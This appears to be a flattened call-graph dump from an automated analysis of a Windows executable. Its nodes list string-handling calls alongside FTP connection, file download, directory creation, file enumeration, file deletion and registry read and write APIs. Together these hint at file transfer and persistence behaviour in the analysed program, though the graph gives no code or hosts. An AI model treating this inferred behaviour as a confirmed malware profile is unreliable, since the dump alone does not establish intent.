??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1211->1216 1214 673560 4 API calls 1212->1214 1213->1207 1217 674921 1214->1217 1215->1175 1284 6735f0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1216->1284 1217->1211 1219 67495b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1219->1215 1221 674c06 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 1220->1221 1222 674c04 1220->1222 1224 6751f4 GetCurrentProcess TerminateProcess 1221->1224 1225 6751ec _crt_debugger_hook 1221->1225 1222->1161 1224->1161 1225->1224 1227 671293 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 1226->1227 1228 671272 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1226->1228 1227->1164 1228->1227 1228->1228 1230 671a56 1229->1230 1231 6714da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1229->1231 1232 674bfc 7 API calls 1230->1232 1288 6712b0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1231->1288 1234 671a70 1232->1234 1234->1176 1236 671535 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1236->1236 1237 67155a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1236->1237 1238 6715c7 1237->1238 1239 67159d 1237->1239 1241 6715f5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1238->1241 1242 6715d0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1238->1242 1240 6715a0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1239->1240 1240->1238 1240->1240 1243 67165f 1241->1243 1244 671638 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1241->1244 1242->1241 1242->1242 1245 671695 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1243->1245 1246 671670 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1243->1246 1244->1243 1244->1244 1247 6716d6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1245->1247 1248 6716fd 1245->1248 1246->1245 1246->1246 1247->1247 1247->1248 1249 671705 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1248->1249 1250 67172a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1248->1250 1249->1249 1249->1250 1251 671797 1250->1251 1252 67176b 1250->1252 1254 6717c5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1251->1254 1255 6717a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1251->1255 1253 671770 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1252->1253 1253->1251 1253->1253 1256 67182f 1254->1256 1257 671808 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1254->1257 1255->1254 1255->1255 1258 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1256->1258 1259 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1256->1259 1257->1256 1257->1257 1260 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1258->1260 1261 6718cd 1258->1261 1259->1258 1259->1259 1260->1260 1260->1261 1262 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1261->1262 1263 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1261->1263 1262->1262 1262->1263 1264 671967 1263->1264 1265 67193d 1263->1265 1266 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1264->1266 1268 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1264->1268 1267 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1265->1267 1269 671a07 1266->1269 1270 6719de 1266->1270 1267->1264 1267->1267 1268->1266 1268->1268 1272 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1269->1272 1273 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1269->1273 1271 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1270->1271 1271->1269 1271->1271 1272->1230 1273->1272 1273->1273 1274->1180 1276 6736f7 6 API calls 1275->1276 1277 67374e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1275->1277 1278 67375f 1276->1278 1277->1278 1279 674bfc 7 API calls 1278->1279 1280 673777 1279->1280 1280->1182 1282 6735b6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1281->1282 1283 6735ce ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1281->1283 1282->1203 1283->1203 1285 673643 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1284->1285 1286 673660 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1284->1286 1287 67366d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1285->1287 1286->1287 1287->1219 1289 6712e3 1288->1289 1290 6712c2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1288->1290 1289->1236 1289->1237 1290->1289 1290->1290 1511 671839 1512 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1511->1512 1512->1512 1513 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1512->1513 1514 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1513->1514 1515 6718cd 1513->1515 1514->1514 1514->1515 1516 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1515->1516 1517 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1515->1517 1516->1516 1516->1517 1518 671967 1517->1518 1519 67193d 1517->1519 1520 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1518->1520 1522 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1518->1522 1521 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1519->1521 1523 671a07 1520->1523 1524 6719de 1520->1524 1521->1518 1521->1521 1522->1520 1522->1522 1526 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1523->1526 1527 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1523->1527 1525 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1524->1525 1525->1523 1525->1525 1528 671a56 1526->1528 1527->1526 1527->1527 1529 674bfc 7 API calls 1528->1529 1530 671a70 1529->1530 1531 674e38 1552 675208 1531->1552 1533 674e44 GetStartupInfoA 1534 674e72 InterlockedCompareExchange 1533->1534 1535 674e80 1534->1535 1536 674e84 1534->1536 1535->1536 1537 674e8b Sleep 1535->1537 1538 674ea4 _amsg_exit 1536->1538 1539 674eae 1536->1539 1537->1534 1540 674ed7 1538->1540 1539->1540 1541 674eb7 _initterm_e 1539->1541 1543 674ee6 _initterm 1540->1543 1544 674f01 1540->1544 1541->1540 1542 674ed2 __onexit 1541->1542 1543->1544 1545 674f05 InterlockedExchange 1544->1545 1546 674f0d __IsNonwritableInCurrentImage 1544->1546 1545->1546 1547 674f9c _ismbblead 1546->1547 1549 674f86 exit 1546->1549 1550 674fe1 1546->1550 1553 671380 LoadStringA LoadStringA 1546->1553 1547->1546 1549->1546 1550->1542 1551 674fea _cexit 1550->1551 1551->1542 1552->1533 1563 674470 LoadIconA LoadCursorA LoadIconA RegisterClassExA 1553->1563 1555 6713ae CreateWindowExA 1556 671472 1555->1556 1557 6713ea ShowWindow UpdateWindow LoadAcceleratorsA GetMessageA 1555->1557 1556->1546 1558 671464 1557->1558 1559 67141c 1557->1559 1558->1546 1560 671430 TranslateAcceleratorA 1559->1560 1561 671453 GetMessageA 1560->1561 1562 671441 TranslateMessage DispatchMessageA 1560->1562 1561->1558 1561->1560 1562->1561 1563->1555 1697 675603 1698 674bfc 7 API calls 1697->1698 1699 675614 1698->1699 1704 675017 1705 675025 __set_app_type _encode_pointer __p__fmode __p__commode 1704->1705 1707 6750c4 _pre_c_init __RTC_Initialize 1705->1707 1708 6750d2 __setusermatherr 1707->1708 1709 6750de 1707->1709 1708->1709 1714 6754aa _controlfp_s 1709->1714 1712 6750f5 1713 6750ec _configthreadlocale 1713->1712 1715 6754c6 _invoke_watson 1714->1715 1716 6750e3 1714->1716 1715->1716 1716->1712 1716->1713 1719 675c10 1720 675c2b 1719->1720 1721 674d15 _pre_cpp_init 10 API calls 1720->1721 1722 675c35 1721->1722 1728 6752e0 SetUnhandledExceptionFilter 1730 674ded 1731 674d15 _pre_cpp_init 10 API calls 1730->1731 1732 674df7 __getmainargs 1731->1732 1733 674e37 1732->1733 1734 674e2f _amsg_exit 1732->1734 1734->1733 1738 6755e9 1739 6755f5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1738->1739 1740 675602 1738->1740 1739->1740 1743 6750f8 1746 6754d8 1743->1746 1745 6750fd 1745->1745 1747 6754fd 1746->1747 1748 67550a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1746->1748 1747->1748 1749 675501 1747->1749 1748->1749 1749->1745 1750 674fc6 1751 674fe1 1750->1751 1752 674fda _exit 1750->1752 1753 674fea _cexit 1751->1753 1754 674ff0 __onexit 1751->1754 1752->1751 1753->1754 1757 674bc0 1758 674bf4 1757->1758 1759 674bcb 1757->1759 1760 674be0 1759->1760 1761 674be5 EndDialog 1759->1761 1761->1758 1856 6755a0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1870 6755b2 1871 674bfc 7 API calls 1870->1871 1872 6755c3 1871->1872 1873 674bfc 7 API calls 1872->1873 1874 6755d0 1873->1874 1875 674fb2 _XcptFilter 1291 6741b0 DeleteFileA GetLocalTime InternetOpenA InternetConnectA 1292 674433 1291->1292 1293 674249 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1291->1293 1295 671480 85 API calls 1292->1295 1322 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1293->1322 1297 674438 1295->1297 1296 674262 1323 673b90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1296->1323 1299 674bfc 7 API calls 1297->1299 1300 674464 1299->1300 1302 671260 4 API calls 1303 6742ae ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1302->1303 1304 6742e3 1303->1304 1305 6742ca ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1303->1305 1368 671cb0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1304->1368 1367 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1305->1367 1309 6742f9 1312 67432b RegOpenKeyExA memset RegQueryValueExA 1309->1312 1315 674326 1309->1315 1319 674321 1309->1319 1311 674407 InternetCloseHandle InternetCloseHandle ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1311->1292 1313 674385 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 1312->1313 1314 6743dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1312->1314 1316 6743ac RegSetValueExA 1313->1316 1317 67439c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1313->1317 1314->1315 1315->1311 1469 673790 memset 1315->1469 1316->1315 1317->1316 1403 6724f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1319->1403 1322->1296 1324 673c47 1323->1324 1325 673c1b 1323->1325 1327 673e27 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1324->1327 1328 673c6a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1324->1328 1326 673c20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1325->1326 1326->1324 1326->1326 1329 673e50 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen fopen memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1327->1329 1330 6740e9 8 API calls 1327->1330 1331 674164 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1328->1331 1332 673c8b ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen fopen memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1328->1332 1333 673eb5 fgetc 1329->1333 1330->1331 1334 674bfc 7 API calls 1331->1334 1335 673cf6 fgetc 1332->1335 1336 674033 1333->1336 1337 673ec9 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1333->1337 1338 67419a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1334->1338 1339 673d94 1335->1339 1340 673d09 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1335->1340 1342 674038 feof 1336->1342 1343 673f4e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1337->1343 1344 673eed ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1337->1344 1338->1302 1341 673d99 feof 1339->1341 1345 673d5f ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1340->1345 1346 673d2d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1340->1346 1341->1335 1347 673dac 8 API calls 1341->1347 1342->1333 1348 67404c 11 API calls 1342->1348 1351 673fa5 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1343->1351 1352 673f63 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1343->1352 1487 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1344->1487 1353 673d7d memset 1345->1353 1350 6736a0 15 API calls 1346->1350 1347->1331 1348->1331 1357 673d46 fprintf 1350->1357 1354 67401c memset 1351->1354 1355 673fba ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1351->1355 1358 6736a0 15 API calls 1352->1358 1353->1341 1354->1342 1488 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1355->1488 1356 673f06 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1360 6736a0 15 API calls 1356->1360 1357->1353 1364 673f1c 1358->1364 1360->1364 1361 673fd3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1363 6736a0 15 API calls 1361->1363 1362 671480 85 API calls 1362->1364 1363->1364 1364->1354 1364->1362 1365 67400e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1364->1365 1489 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1365->1489 1367->1304 1369 671260 4 API calls 1368->1369 1370 671d35 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1369->1370 1371 672096 14 API calls 1370->1371 1372 671d5e 14 API calls 1370->1372 1375 6721a6 DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1371->1375 1373 671e80 fgetc 1372->1373 1374 671e4b 1372->1374 1376 671e96 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1373->1376 1377 671e77 1373->1377 1378 671e50 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1374->1378 1379 674bfc 7 API calls 1375->1379 1380 671ec6 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1376->1380 1381 671f4b fprintf fprintf 1376->1381 1377->1373 1382 671f34 feof 1377->1382 1378->1377 1378->1378 1383 6721e7 1379->1383 1384 671fb4 fprintf fprintf 1380->1384 1390 671edf 1380->1390 1385 67201a fprintf fprintf 1381->1385 1382->1373 1386 671f46 1382->1386 1383->1309 1392 6721f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1383->1392 1384->1385 1389 672030 7 API calls 1385->1389 1386->1389 1387 671ee6 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1388 671efe ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1387->1388 1388->1390 1391 671f18 memset 1388->1391 1389->1375 1390->1387 1390->1388 1390->1391 1391->1382 1490 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1392->1490 1394 672243 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1395 671260 4 API calls 1394->1395 1396 67228a 12 API calls 1395->1396 1491 671a80 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1396->1491 1399 671a80 33 API calls 1400 672467 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1399->1400 1401 674bfc 7 API calls 1400->1401 1402 6724d0 1401->1402 1402->1309 1501 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1403->1501 1405 672550 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1406 6725b7 1405->1406 1407 6725f3 6 API calls 1405->1407 1408 6725c0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1406->1408 1409 672683 1407->1409 1410 672a3f FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1407->1410 1408->1407 1408->1408 1412 672a20 FindNextFileA 1409->1412 1413 67269e 7 API calls 1409->1413 1416 67288e FindNextFileA 1409->1416 1419 67275d 10 API calls 1409->1419 1421 672a09 FindNextFileA 1409->1421 1429 6728da 10 API calls 1409->1429 1411 671260 4 API calls 1410->1411 1414 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1411->1414 1412->1409 1415 672a3b 1412->1415 1413->1409 1413->1416 1504 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1414->1504 1415->1410 1416->1409 1416->1412 1418 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1420 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 